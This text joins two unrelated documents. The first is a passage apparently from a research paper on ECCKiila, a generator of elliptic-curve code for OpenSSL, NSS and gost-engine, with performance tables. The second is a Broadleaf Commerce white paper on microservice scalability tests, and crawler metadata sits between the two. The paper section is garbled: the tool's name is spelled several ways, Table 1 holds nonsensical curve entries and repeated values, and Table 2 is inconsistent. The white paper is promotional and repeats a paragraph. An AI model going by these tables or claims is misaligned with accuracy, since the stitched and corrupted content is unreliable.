curves of cardinality $4q$ being $q \approx p$ a prime number. For those two special curves, gost-engine curves are represented in short Weierstrass form at the specification level (i.e. “on-the-wire” or when serialized) but internally we use the Twisted Edwards curve representation. Additionally, we implemented the mappings that connect $E_w$ and $E_I$ by writing (4) and (3) in their projective form to delay the costly inversion in $GF(p)$. We used the same strategy for MDCurve20160, the “Million Dollar Curve” [5] as a research-oriented example. Point arithmetic. The way of adding points depends on the curve model being used, but we describe the three main point operations as follows: (i) the mixed point addition that takes as inputs a projective point and an affine point, and it returns a projective point; (ii) the projective point addition and (iii) the projective point doubling, which their inputs and outputs are projective points. We use the exception-free formulas proposed by Renes et al. [38, Sec. 3] and Hisil et al. [22, Sec. 3.1, Sec. 3.3] for Weierstrass and Twisted Edwards models, respectively. In particular, all ECC arithmetic is machine generated, tied to the op3 files included in our software implementation. Our tooling is configurable in that sense, but also with high correctness confidence. Now, recall in Weierstrass models $O$ has no affine representation and thus the mixed point addition needs to catch whether the affine point describes $O$. We solve this by asking if its affine $y$-coordinate is zero and performing a conditional copy at the end of the mixed point addition, all in constant time. That is, we set $(0,0)$ as the affine representation of $O$, which does not satisfy the affine curve equation of $E_w$ (no order-2 point exists on curves with prime cardinality, hence $y = 0$ is a contradiction). However, this is not the case for Twisted Edwards models, which allow fully exception-free formulas for point addition procedures. Point multiplication. The heart of our ECC layer is point multiplication—fixed point $g$, variable point $P$, and also by the double point multiplication $[k]y + [\ell]P$. We implemented the variable point multiplication by representing scalars with the regular-NAF method [26, Sec. 3.2] and $\lg(q)/w$ digits with $\lg(q)$ doublings. The advantage of this method is we need only half the precomputed values compared to e.g. the base 2$^w$ method. We support a variable window length w, and by default $w = 5$. We implemented the fixed point multiplication using the comb method [see [13, 9.3.3]] with interleaving and, similar to the variable point case, using the regular-NAF scalar representation. Our approach seeks full generality and word size independence on each architecture (32 or 64 bit), hence we automatically calculate the number of comb-teeth $\beta$ and the distance between consecutive teeth $\lfloor \lg(q)/\beta \rfloor$, where the latter should be a multiple of $w$, considering the size of the L1 cache in this process. Therefore, the static LUTs span $\beta$ tables requiring $\lfloor \lg(q)/\beta \rfloor$ doublings. Both methods are constant time, performing exactly $\lg(q)/w$ point additions, and using linear passes to ensure key-independent memory access not only to LUTs but also in conditional point negations due to the signed scalar representation and conditional trailing subtraction to handle even scalars; the regular-NAF encoding itself is also constant time. We implemented double point multiplication using textbook wNAF [13, 9.1.4] combined with Shamir’s trick [13, 9.1.5]. This shares the doublings, i.e. maximum $\lg(q)$ in number, but on average reduces the number of additions per scalar. This is because it is variable-time—only required in digital signature verification where all inputs are public. Rigging. At this point, the resulting C code yields functional arithmetic for the ECC layer. But we observe a gap between such code and real world projects. On one hand, researchers intimately familiar with ECC details lack the skill, motivation, and/or domain-specific knowledge to integrate the ECC stack into downstream large software projects. On the other hand, developers for those downstream projects lack the intimate knowledge of the upstream ECC layer to integrate properly—historical issues include assumptions on architecture, alignment, endianness, supported ranges to name a few. For example, one obscure issue encountered during OpenSSL ECCKiila integration was lack of OpenSSL unit testing for custom ECC group base points, which OpenSSL supports but ECCKiila cannot fully accelerate since the generated LUTs are static, but regardless must detect and handle the base point mismatch. Our integrations passed all OpenSSL unit tests, which is clearly not correct in this corner case. To solve this issue, the last layer of ECCKiila is rigging that is essentially plumbing for downstream projects. Rigging is library-specific by nature, and ECCKiila currently supports three back-ends: OpenSSL, NSS, and gost-engine. For OpenSSL, ECCKiila generates an EC_GROUP structure, which is the OpenSSL internal representation of a curve with function pointers for various operations. We designed simple wrappers for three relevant function pointers, which are shallow and eventually (after sanity checking arguments and transforming the inputs to the expected format) call the corresponding scalar multiplication implementation in Figure 1. NSS is similar with an ECGroup structure. The gost-engine rigging (mostly) decouples it from OpenSSL’s EC module, since it only needs to support GOST curves with explicit parameters. Example: P-384 in OpenSSL and NSS. What follows is a walkthrough of our integration of secp384r1 into OpenSSL and NSS. ECCKiila has a large database (JSON) of standard curves, then generates both 64-bit and 32-bit $GF(p)$ arithmetic using Fiat. It then takes the $h = 1$, $a = -3$ path in Figure 1 and generates the three relevant scalar multiplication functions that utilize exception-free formulas from [38] optimized for $a = -3$. Finally, ECCKiila emits the OpenSSL rigging for OpenSSL integration, and NSS rigging for NSS integration. Adding the code to OpenSSL is the only current manual step: one line to add the new code to the build system, one line to add the prototype of the new EC_METHOD structure in a header, and one line to point OpenSSL at this structure for the secp384r1 definition. The NSS integration is very similar. Example: GOST twisted 256-bit curve. What follows is a walkthrough of our integration of id_tc26_gost_3410_2012_256_paramSetA into gost-engine. ECCKiila takes the $h = 4$, $e = 1$ path in Figure 1. and generates the three relevant scalar multiplication functions that utilize exception-free formulas from [22] optimized for \( e = 1 \), and noting the \( E_w \) to \( E_t \) mappings (and back) are transparent to the caller (gost-engine rigging, in this case). Finally, ECCKiila emits the gost-engine rigging, and enabling this code in gost-engine is currently the only manual step: one line to add the code to the gost-engine build system, and three lines in a C switch statement to enable each of the relevant scalar multiplication routines. **Example: million dollar curve in OpenSSL.** Not to limit ECCKiila to only formally standardized curves, here we showcase the research value of ECCKiila by applying it to MDCurve20160 [5], which has undergone no formal standardization process. As such, we took the GOST approach that perhaps the \( E_w \) curve might be standardized, and the \( E_t \) curve utilized internally. We applaud this approach in GOST because, in practice, it eases downstream integration and lowers the effort bar during standardization—on the downside, it does reduce flexibility since it implies compliance with certain existing (legacy) standards. The process for ECCKiila is a logical mix of the previous two examples: taking a path similar to the GOST example, but the generated rigging is OpenSSL. In this case, OpenSSL knows nothing about MDCurve20160 so we obtained an unofficial OID for MDCurve20160 and the rigging additionally emits the explicit curve parameters so OpenSSL knows how to construct its internal ECC group. The only manual steps are similar to the previous examples, yet additionally inserting these parameters. Once OpenSSL knows about MDCurve20160 from the automated rigging, it can drive operations with MDCurve20160 like any other (legacy) curve: ECC key generation, ECDSA signing and verifying, and ECC CDH key agreement. This highlights the research value of ECCKiila, and gives a clear and simple path for researchers seeking dissemination and exploitation: obtain an official OID for standardization, provide curve parameters to ECCKiila, and submit a PR to downstream projects. In the case that more modern signature and key agreement schemes are desired, additional steps are needed at both the standardization, implementation, and integration levels. ### 4.1 ECCKiila: results We now present the results of applying ECCKiila to the curves listed in Table 1. First, it is important to note our measurements are not on the ECCKiila code directly, rather on the application-level view of how developers and users of the corresponding libraries will transparently see the resulting performance difference. That is, we are measuring the **full integration**, not the ECCKiila code in isolation. So it includes e.g. all overheads from the rigging, any checks and serialization/deserialization the libraries perform, any memory allocation/deallocation and structure initialization, as well as any other required arithmetic not part of ECCKiila (e.g. \( GF(q) \) arithmetic for ECDSA and GOST signatures). To compare the performance of our approach, we measure the timing of unmodified OpenSSL 3.0 alpha, gost-engine, and NSS 3.53 (called **baseline**), and the same versions then modified with the ECCKiila output (**integration**). For each one of them, we measured the timings from the operations described in Section 2 such as key generation, key agreement (derivation), signing, and verification. For the sake of simplicity, we refer to them as keygen, derive, sign, and verify, respectively. The hardware and software setup used to get the timings reported in this section are the following: Intel Xeon Silver 4116 2.10GHz, Ubuntu 16.04 LTS “Xenial”, GNU11 C, and clang-10. We used 64-bit builds, although the ECCKiila generated code selects the correct implementation using the compiler’s preprocessor at build time. For the clock cycle measurements, we used the newspeed utility, unifying the OpenSSL and gost-engine measurements since it works through OpenSSL’s EVP interface and optionally supports engines. For the two NSS results, we modified their ecperf benchmarking utility to report median clock cycles instead of wall clock time. Table 2 reports timings for both approaches, showing the result of our proposal has good performance regarding the original versions. There are several nuances to clarify in the data. In particular, in the signature of our proposal where \( id\_Gost3410\_2001\_CryptoPro\_A\_ParamSet \) is faster than secp256k1: the reason is GOST signatures do not invert modulo \( q \) while ECDSA signatures do, and this is a costly operation. Also, we can see that secp256r1 has excellent performance due to manual AVX assembler optimizations, while ECCKiila is portable C. Despite this, the curve utilized externally. <table> <thead> <tr> <th>Curve</th> <th>Library</th> <th>External model (standard)</th> <th>Internal model (ECVaHy)</th> <th>( \text{log} )</th> </tr> </thead> <tbody> <tr> <td>secp192k1</td> <td>OpenSSL</td> <td>Weierstrass with ( a = -1 )</td> <td>Weierstrass with ( a = -1 )</td> <td>190</td> </tr> <tr> <td>secp256k1</td> <td>OpenSSL</td> <td>Weierstrass with ( a = -1 )</td> <td>Weierstrass with ( a = -1 )</td> <td>190</td> </tr> <tr> <td>256</td> <td>OpenSSL</td> <td>Weierstrass with ( a = -1 )</td> <td>Weierstrass with ( a = -1 )</td> <td>190</td> </tr> <tr> <td>255</td> <td>OpenSSL</td> <td>Weierstrass with ( a = -1 )</td> <td>Weierstrass with ( a = -1 )</td> <td>190</td> </tr> </tbody> </table> **Table 1: List of all the curves tested with ECCKiila** ### 5 CONCLUSION In this work, we presented two methodologies. ECCKiila allows carrying out a set of tests over an arbitrary ECC implementation, including (but not limited to) all standard curves from OpenSSL. --- 11https://github.com/romen/newspeed 12https://github.com/nss-dev/nss/tree/master/cmd/ecperf NSS, and gost-engine where it gave us excellent results because we uncovered several novel defects in OpenSSL such as a scalar multiplication failure and an ECC CDH vulnerability. Meanwhile, for GOST we detected a VKO vulnerability that can reveal sensitive information from the private key. Our second proposal ECCKila is partially motivated by these vulnerabilities. With the use of EC-Cika, we can generate code dynamically for any curve, including all standard curves from OpenSSL, NSS, and GOST. This code is highly competitive in comparison with the original versions from OpenSSL, NSS, and gost-engine since we have a speedup factor up to 9.5x for key generation, 4.5x for key agreement, 13.3x for signing, and 3.7x for verifying as Table 2 shows. Furthermore, ECCKila is flexible and robust since we can easily add new curves without increasing the complexity of the development–upstream or downstream. Hence, we believe our methodologies are of interest for future work, both in research and application. Quoting Davis [14]: programmers need “turnkey” cryptography, not only cryptographic toolkits and that is precisely what ECCKila provides. The ease of integrating these stacks in downstream projects, coupled with formal verification guarantees on the Galois field arithmetic and simplicity of upper layers, and automated code generation, provides drop-in, zero-maintenance solutions for real-world, security-critical libraries. We release ECCKila\(^\text{\textsuperscript{13}}\) as FOSS, furthermore in support of Open Science. **Acknowledgments.** This project has received funding from the European Research Council (ERC) under the European Union’s Horizon 2020 research and innovation programme (grant agreement No 804476). \(^\text{13}\)https://gitlab.com/nisec/ecckiila **Table 2:** Comparison of timings between the baseline and the integration from OpenSSL, gost-engine, and NSS. All timings are reported in clock cycles (thousands). <table> <thead> <tr> <th>Curve/Parameter</th> <th>KeyGen</th> <th>Derive</th> <th>Sign</th> <th>Verify</th> </tr> </thead> <tbody> <tr> <td>secp384r1</td> <td>1.1x</td> <td>1.2x</td> <td>1.6x</td> <td>4.5x</td> </tr> <tr> <td>brainpoolP128t1</td> <td>1.3x</td> <td>1.0x</td> <td>1.4x</td> <td>2.9x</td> </tr> <tr> <td>secp521r1</td> <td>1.1x</td> <td>1.2x</td> <td>2.5x</td> <td>5.1x</td> </tr> <tr> <td>sec2p256r1</td> <td>26.6x</td> <td>25x</td> <td>2.5x</td> <td>5.1x</td> </tr> </tbody> </table> **REFERENCES**
{"Source-Url": "https://export.arxiv.org/pdf/2007.11481", "len_cl100k_base": 15024, "olmocr-version": "0.1.49", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 42522, "total-output-tokens": 17033, "length": "2e13", "weborganizer": {"__label__adult": 0.0004992485046386719, "__label__art_design": 0.0004820823669433594, "__label__crime_law": 0.001003265380859375, "__label__education_jobs": 0.0008373260498046875, "__label__entertainment": 0.00012373924255371094, "__label__fashion_beauty": 0.0002090930938720703, "__label__finance_business": 0.0006012916564941406, "__label__food_dining": 0.0003490447998046875, "__label__games": 0.0011148452758789062, "__label__hardware": 0.0019350051879882812, "__label__health": 0.0007772445678710938, "__label__history": 0.0006189346313476562, "__label__home_hobbies": 0.00014603137969970703, "__label__industrial": 0.0009183883666992188, "__label__literature": 0.0003330707550048828, "__label__politics": 0.000423431396484375, "__label__religion": 0.0007123947143554688, "__label__science_tech": 0.31494140625, "__label__social_life": 0.00013685226440429688, "__label__software": 0.01617431640625, "__label__software_dev": 0.65625, "__label__sports_fitness": 0.00042939186096191406, "__label__transportation": 0.0007348060607910156, "__label__travel": 0.0002627372741699219}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 67193, 0.05222]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 67193, 0.49314]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 67193, 0.88675]], "google_gemma-3-12b-it_contains_pii": [[0, 5485, false], [5485, 11486, null], [11486, 17304, null], [17304, 23820, null], [23820, 30673, null], [30673, 44785, null], [44785, 49282, null], [49282, 56326, null], [56326, 62055, null], [62055, 67193, null], [67193, 67193, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5485, true], [5485, 11486, null], [11486, 17304, null], [17304, 23820, null], [23820, 30673, null], [30673, 44785, null], [44785, 49282, null], [49282, 56326, null], [56326, 62055, null], [62055, 67193, null], [67193, 67193, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 67193, null]], "pdf_page_numbers": [[0, 5485, 1], [5485, 11486, 2], [11486, 17304, 3], [17304, 23820, 4], [23820, 30673, 5], [30673, 44785, 6], [44785, 49282, 7], [49282, 56326, 8], [56326, 62055, 9], [62055, 67193, 10], [67193, 67193, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 67193, 0.05742]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
74c16f117e8c742ee3c5ea42236bb6277c6c2cd6
scalability noun the capacity to be changed in size or scale; the ability of a computing process to be used or produced in a range of capabilities. # Table of Contents Introduction ...................................................................... 4 Test Methodology .............................................................. 5 ## Test Results ........................................................................ 8 - Throughput 9 - Concurrent Users 10 - Data Variations 11 - Catalog Size 12 - Conversion Rates 13 Considerations ...................................................................... 15 - Cost 16 - Culture 17 - Caching 19 - Auto Scale 20 - Database 20 - CDN 21 - Third Party Integrations 21 - Customizations 21 Conclusion ........................................................................ 22 Appendices ........................................................................ 24 Meet the Author JEFF FISCHER Introduction Broadleaf Commerce (Broadleaf) provides companies with a platform for building high performance commerce solutions. Based on best of breed open source technologies including the Spring Framework, Broadleaf was designed from the ground up to be extensible and scalable for businesses and institutions requiring a mission critical eCommerce solution. With a robust microservices architecture, Broadleaf embraces the latest thought in software architecture principles and practice. Coupled with our innovations in advanced composable commerce, Broadleaf provides a forward-thinking architecture that can fit into any infrastructure budget. This paper provides details of scalability tests performed with the Broadleaf Commerce Microservices reference implementation. Testing was completed using a range of node size combinations in a standard kubernetes cluster in the cloud. With the ability to easily scale to thousands of transactions per second across tens of thousands of concurrent users and millions of products, the test results speak for themselves. Note, for details on configuration and test plan specifics, refer to the appendices at the end of the document. Section 1 Test Methodology Simulating real-world shopping scenarios with industry average conversion rates How to read the charts in this study For this paper, we have employed a naming scheme that combines application and infrastructure sizing into a shortened name for easy reference. Throughout this document, you will see chart references to items such as “BS3”, or “GL5”. Refer to the chart below to understand how these terms relate to application and infrastructure resources. <table> <thead> <tr> <th>Application FlexPackage™️</th> <th>Kubernetes Infrastructure</th> <th>Label</th> </tr> </thead> <tbody> <tr> <td>Min</td> <td>Small; 1 4-core Node</td> <td>MS1</td> </tr> <tr> <td>Balanced</td> <td>Small; 3 4-core Nodes</td> <td>BS3</td> </tr> <tr> <td>Balanced</td> <td>Small; 5 4-core Nodes</td> <td>BS5</td> </tr> <tr> <td>Balanced</td> <td>Medium; 3 8-core Nodes</td> <td>BM3</td> </tr> <tr> <td>Balanced</td> <td>Medium; 5 8-core Nodes</td> <td>BM5</td> </tr> <tr> <td>Balanced</td> <td>Large; 3 16-core Nodes</td> <td>BL3</td> </tr> <tr> <td>Balanced</td> <td>Large; 5 16-core Nodes</td> <td>BL5</td> </tr> <tr> <td>Granular</td> <td>Large; 3 16-core Nodes</td> <td>GL3</td> </tr> <tr> <td>Granular</td> <td>Large; 5 16-core Nodes</td> <td>GL5</td> </tr> </tbody> </table> See the “Considerations” section (specifically “Cost” and “Culture”) for more details on FlexPackage™️ options. Simulating real-world scenarios when testing an e-commerce application is critical in determining not only how efficiently the software performs under normal circumstances, but also how many users it can serve during peak demand. While testing up to a 100% conversion rate to ensure performance on “Black Friday” and “Cyber Monday” behavior was accounted for, most test cases conducted an average 10% add-to-cart action and an aggregated 3% conversion rate. In all cases, Broadleaf set out to report objective scalability numbers. In isolation, test cases for “home page views” or “orders” have no merit outside of simulated consumer behavior. The ability for a system to handle hundreds of millions of views to a single page without any other variable is a useless statistic in itself. Furthermore, test cases with varying concurrent user numbers hold no value unless tested against concurrent user behavior. A test was considered “passing” if the Broadleaf framework generally responded to API calls with an average response time of 500 ms, or less. Furthermore, real world usage of microservice APIs often require several calls to fulfill a concept, such as rendering a product detail page. In these cases, we also measured the aggregate response time of all API calls involved to complete the overall user experience and confirmed the sum of timings was generally less than 1 second. Finally, test cases were given a several minute warm up time followed by a 2 minute ramp-up period before experiencing peak load. Refer to Appendix C for more details on the approach. Note on nomenclature - For this paper, we have employed a naming scheme that combines application and infrastructure sizing into a shortened name for easy reference. Throughout this document, you will see chart references to items such as “BS3”, or “GL5”. Refer to the chart below to understand how these terms relate to application and infrastructure resources. Section 2 Test Results Against high traffic, large product catalogs, and peak season spikes, Broadleaf Commerce proves the ability to handle the most stringent scalability requirements. 1. Throughput Peak demand is defined based on industry, customer base, and seasonality. Through all major peak eCommerce variables, Broadleaf proves the ability to scale. Across high transaction volume, concurrent users, large catalogs, and high conversion rates, Broadleaf exhibits consistent peak performance. For test purposes, Broadleaf focuses on throughput as it relates to completed transactions per second (TPS), and completed orders per second (OPS). A transaction in this context refers to an individual microservice API call to complete a unit of functionality as it relates to the overall ecommerce test plan. Refer to Appendix A for more details on the test plans used. By adding replicas of application microservices to a growing kubernetes cluster, we demonstrate fairly linear scale as we seek to increase throughput. The initial test focuses on the classic heavy browse use case culminating in a 3% conversion rate to completed orders. Such a case involves significant user activity in the areas of search, catalog browsing, and registered customer login and account perusal. A 10K product catalog is used in all cases, unless otherwise specified. In this round of tests, the Balanced FlexPackage™ throughput was examined through small, medium, and large infrastructure configurations, culminating in 3400 TPS for the system. The Granular FlexPackage™ was also considered at the larger infrastructure sizes and performed comparably. Spoiler alert - for extreme scale, refer to the Conversion Rate results section, where we demonstrate scaling to 100 orders per second using conventional techniques alone. **Broadleaf demonstrated horizontal scalability, handling 3400 transactions per second at the largest size tested** 2. Concurrent Users In order to simulate concurrent users in a real world scenario, Broadleaf tested virtual users in gated test plans involving percentage advancement at various stages of the customer journey, coupled with quantity and catalog choice randomization. Then, calculating based on an eCommerce average of 1 page view per minute per user, we were able to estimate concurrent user capacities. Broadleaf demonstrated the ability to handle tens of thousands of concurrent users For companies needing to accommodate even more users (e.g., companies that want to be the next Amazon, Facebook, or Twitter), infrastructure build out and serious application performance tuning can be handled with Broadleaf’s Professional Services. For most businesses with typical conversion rates, the numbers demonstrated above can handle sites generating billions of dollars in sales. 3. Data Variations While the 3% conversion rate test plan is interesting on its own, it is important to consider the impact of catalog complexity. In this round of tests, we introduce two factors: discounts and variants/options. Discounts can slow down cart manipulation as it introduces additional calculation required to price items in the cart. Variants (aka Skus) and product options also represent additional catalog complexity for the system to navigate as it addresses inventory and pricing concerns across a larger landscape of customer choice. 100 BOGO offers were introduced into the system - all set to auto apply. This setting indicates that all offers are qualified against the cart contents at the time of add to cart, which is a key computational moment in the cart lifecycle. The effect was a little more noticeable in this case, but overall still not an unfavorable impact at any size tested. Two different tests were run. First, 3 variants per product were introduced with a basic set of product options for the test to negotiate upon add to cart. When compared to normal execution (no variants), the impact was negligible, within a margin of error. Broadleaf demonstrated the ability to handle variations in data complexity with negligible impact. 4. Catalog Size For corporations requiring larger catalog sets, Broadleaf tested an online catalog with 100,000 and 1,000,000 products. Broadleaf Commerce demonstrated the ability to handle wide variations in catalog size with negligible impact. This test focuses on the order life cycle journey using a test plan starting with the product detail page and ending in cart checkout. This test plan is similar to the 100% conversion rate test plan detailed later in this document. Again, we see a negligible impact to performance based on catalog size across all infrastructure combinations. 5. Conversion Rates For corporations with increased conversion rates above industry averages, Broadleaf tested up to 100% conversion. The key metric captured for this test is orders per second (OPS). At the highest tier tested (BL5) using a heavy browse test plan (similar to the standard 3% conversion test plan), Broadleaf demonstrated a volume of 13.83 OPS at a 50% conversion rate. This translates into about 50K order per hour. This type of traffic may be common for some retailers during Black Friday style shopping scenarios. Given an industry standard average order value (AOV) of $128, Broadleaf Commerce can comfortably support billions in revenue on a reasonable hardware budget. Checkout focused results are often requested as well. This type of test plan lightens the browse requirements, and instead opts for an order focused journey. This solely considers the product detail page, and beyond to checkout and order completion - at 100% conversion rate. This type of flow is common with highly targeted product offerings, usually with a small product count. We were able to demonstrate the extreme case of 100 OPS using conventional horizontal scale techniques. For this high end case, we utilized a cluster composed of (6) 16 core nodes, (8) 8 core nodes, and (4) 4 core nodes. We also employed a 16 core cloud native database as the backing datastore. Refer to Appendix A for more detailed information on this test plan. Broadleaf Commerce demonstrated the ability to scale to an extreme 100 OPS using conventional horizontal scale. Section 3 Considerations There are plenty of options that can assist with achieving a Broadleaf installation that is optimized for performance and cost. Cost Infrastructure cost is a major consideration when determining the right platform to leverage for your eCommerce solution. The right balance of infrastructure spend weighed against throughput and revenue expectations is important to estimate carefully ahead of time. To further complicate the issue, modern architecture best practices call for a microservice approach, which affords many benefits, but tends to come at a higher infrastructure cost to support the granular service count. Broadleaf understands these challenges and has come up with an innovative approach to address these issues, without inhibiting future growth. Broadleaf has introduced an infrastructure composability concept entitled FlexPackages™. **A FlexPackage™ is a unit of composition that conserves all of the basic plumbing and components that make up the base of the microservice platform.** Configured on top are the unique components and API that inhabit individual, granular microservices. By putting multiple microservices together into a single FlexPackage™, you can conserve greatly on the complexity and quantity of infrastructure needed to support the stack, while at the same time completely honoring bounded context restrictions and design boundaries. The persistence tier is still isolated per microservice, and the endpoint APIs and asynchronous messaging tier are solely used for inter-service communication. Broadleaf currently ships in the neighborhood of 25 granular microservices. However, we also expose configuration for the Balanced FlexPackage™ that combines these microservices into 4 primary components: Cart, Browse, Supporting, and Processing. Doing so, we are able to comfortably realize smaller infrastructure deployments that would not be feasible with that many individual microservices. And, via configuration alone, the microservices can be combined into other combinations, or broken apart completely into the original, granular representations. This is a powerful feature allowing you to model your infrastructure to match your revenue growth, or IT culture. We call this **Advanced Composable Commerce**, as the FlexPackage™ allows you to model multiple vectors of composability. With microservices, you can choose the features and functions that make sense for your business. With FlexPackages™, you can extend that flexibility into the infrastructure domain. You can also consider savings across multiple environments. For example, with the same codebase, you can package differently for dev, qa, and prod. The possibilities are limitless. Refer to Appendix D for more information on the default FlexPackages™ used, and the components they contain. **Culture** IT Culture is another factor, in addition to cost, that can influence decisions regarding FlexPackage™ choice. Team structures that honor traditional microservice isolation boundaries are likely to favor the most granular representation of each microservice. This type of team tends to operate in a silo and often ships code with a higher frequency - shortening overall time to value. On the other hand, multi-discipline teams may choose to cover multiple bounded contexts and favor shipping less often, or with reduced devops complexity, by reducing microservice count through FlexPackage™ composition. There are pros and cons with both extremes, and there are a spectrum of levels between. **The reality is that IT culture doesn’t always match up nicely with technical innovation, and the FlexPackage™ concept can help soften the devops transition.** If organizations choose to adopt more devops complexity, the FlexPackage™ pattern can help with that transition without requiring code refactoring. Caching Broadleaf leverages the Spring Cache abstraction in key flows for performance benefit. The out-of-the-box implementation we employ leverages Apache Ignite. By using Ignite, we get the benefit of a robust cache architecture, including its features around off-heap cache. By storing cache members off-heap, the burden on the JVM to garbage collect frequent evictions is removed. This benefits the overall GC posture of the application and further stabilizes performance. With default settings, we find that Ignite allocates immediately 256 MB of off-heap memory as a bucket for cache. During our testing, with the caches we provide out-of-the-box, we never exceeded that initial bucket. In fact, we routinely only used about 64 MB of it. Note that each microservice runtime with cache enabled will allocate off-heap memory in this way. While small, this should be accounted for when considering pod scheduling and node capacity. By default, we configure a basic TTL cache in a non-distributed configuration. This means that each microservice instance maintains its own copy of cache. This is the least blocking configuration and is something we generally favor for performance, at the cost of a delay in eviction in most cases. Ignite is flexible and is designed to be used as a distributed cache if needed. If more real time consistency is required, the cache can be configured in this manner, possibly at some throughput cost. Auto Scale Auto scale can be an effective mechanism for meeting occasional demand increase without keeping peak infrastructure available 24/7. By automatically scaling to need, you can decrease overall cost without sacrificing customer experience. Kubernetes provides auto scale features at both the pod and node level. As pod utilization meets configured thresholds, Kubernetes can spawn new replicas to absorb the increase in demand. Furthermore, as pod count exceeds capacity, Kubernetes can spawn additional nodes in the current node pool to create additional capacity for the pod increase. If enabled, Kubernetes will continue to do so until it reaches its configured limit. This configuration is enabled at the point where the infrastructure is provisioned. If using Terraform as we did, it is a setting for the resources in the Terraform template file. There are several factors to consider for auto scale. Broadleaf leverages Java and Spring. There is a startup time cost from initial application launch to the time when the application is ready to receive connections. Compound that with the time Kubernetes requires to spawn a new pod. Further compound that with the time Kubernetes requires to spawn a new node (this latter point is the most costly of the three). A new node is not always required if there is already enough capacity to handle the new pod. Further compound that with the time Kubernetes requires to spawn a new node (this latter point is the most costly of the three). A new node is not always required if there is already enough capacity to handle the new pod. Nonetheless, there is a real time-to-effectivity cost that must be taken into account when considering auto scale. You should not expect instant availability. There are a number of best practices for configuring the Kubernetes cluster autoscaler, horizontal pod autoscaler, and vertical pod autoscaler that can be found online. I won’t detail them all here. However, it is useful to consider demand scenarios and autoscale expectations. If you have ebb and flow of fairly gradual demand, the system will still provide acceptable customer experience under increased demand during the period in which the auto scale process is enacted. If you experience incredible spikes in traffic, you may outpace the scale-up timeline. In such a case, you should maintain additional hot resources to accommodate the spike, or pre-emptively scale up for a temporary timeframe if the spike can be predicted. Database The tests performed in this paper were all executed against a Postgres database (specifically a Google Cloud SQL instance provisioned outside the Kubernetes cluster). While Broadleaf also supports Mysql, MariaDB, and Oracle, our reference implementation leverages Postgres. We found the cloud sql implementation to be highly efficient, roughly equivalent to a similar database installed directly in the cluster. We also found Broadleaf’s usage of database resources to be highly efficient, contributing to an overall performance benefit. In general, the connection pool configured for the application was set to a count of 10. The only exception was the 100 OPS test, which used a connection pool size of 20. During test monitoring, we never found the active usage to exceed that threshold, with little or no blocking at acquisition. We also found that database vertical scale requirements were minimal as the application itself scaled. Most of the test cases required only an 8 or less CPU instance for the database. The exception was the 100 OPS extreme test, which used a 16 core instance. However, at that scale, that is a very acceptable sizing. For tuning the database itself, throughput levers for cloud native instances tend to be governed by sizing. Factors such as storage size, CPU count, and RAM can affect disk IO quota, network throughput, and max connection count, respectively. CDN The load test did not retrieve graphics or other static assets from the application container, nor did it engage the built-in asset server for any managed asset retrieval. Most high volume sites will benefit from having static assets delivered to users via a CDN (Content Delivery Network). CDN solutions offer hi-speed nodes located across the globe with delivery of your assets coming from the nodes closest to a given user. This serves to reduce response times for your application and lessens unnecessary load on your application container. Third Party Integrations Typical enterprise eCommerce systems can contain ten or more integrations. Each integration has the potential to negatively affect the scalability of the system. It is important to use best practices for integrating with other systems to ensure that one poorly performing third party integration does not bring down the entire system. Tuning strategies, including cache and circuit-breaker patterns, can help to avoid hotspots and maintain acceptable customer experience. Customizations The load tests reported in this paper were performed against a reference implementation of the Broadleaf Microservice Framework. As such, there was no custom code included in the test outside of what Broadleaf itself provides. Client implementations built on top of the Broadleaf Framework will necessarily include additional customizations, libraries, and integrations that can possibly contribute to performance degradation. For this reason, each new implementation should itself go through a load test analysis to qualify it as meeting performance expectations. Should you need it, Broadleaf provides professional services to help with performance tuning your implementation. Conclusion The Broadleaf Commerce framework scales across all testing metrics to meet the needs of even the most demanding eCommerce sites. Well known retailers and businesses depend on Broadleaf Commerce to power their eCommerce solutions, as Broadleaf provides best-in-class eCommerce capabilities at the highest value. *Broadleaf proved real business use cases across multiple scenarios, demonstrating:* - **Thousands of transactions per second** - **Tens of thousands of concurrent users** - **Millions of products** - **Billions of dollars worth of sales** Furthermore, the provided test results demonstrate that Broadleaf Commerce scales horizontally by adding additional microservice instances. This type of scaling is ideal for cloud based environments, especially those leveraging kubernetes. Finally, the results demonstrate that Broadleaf’s FlexPackage™ technology enables deployment of a large microservice architecture on a hardware footprint that can fit into any budget. For more information on Broadleaf, please visit: [www.broadleafcommerce.com](http://www.broadleafcommerce.com) Appendices Appendix A - Test Plan Standard, Browse Heavy Test Plan <table> <thead> <tr> <th>Component</th> <th>Percentage</th> </tr> </thead> <tbody> <tr> <td>Home Page</td> <td>100%</td> </tr> <tr> <td>Category Search API</td> <td>40%</td> </tr> <tr> <td>Category Details API</td> <td>40%</td> </tr> <tr> <td>Product API</td> <td>40%</td> </tr> <tr> <td>Product Details API</td> <td>40%</td> </tr> <tr> <td>Marketing Message API</td> <td>40%</td> </tr> <tr> <td>Product Search</td> <td>25%</td> </tr> <tr> <td>Login API</td> <td>20%</td> </tr> <tr> <td>Auth API</td> <td>20%</td> </tr> <tr> <td>Code API</td> <td>20%</td> </tr> 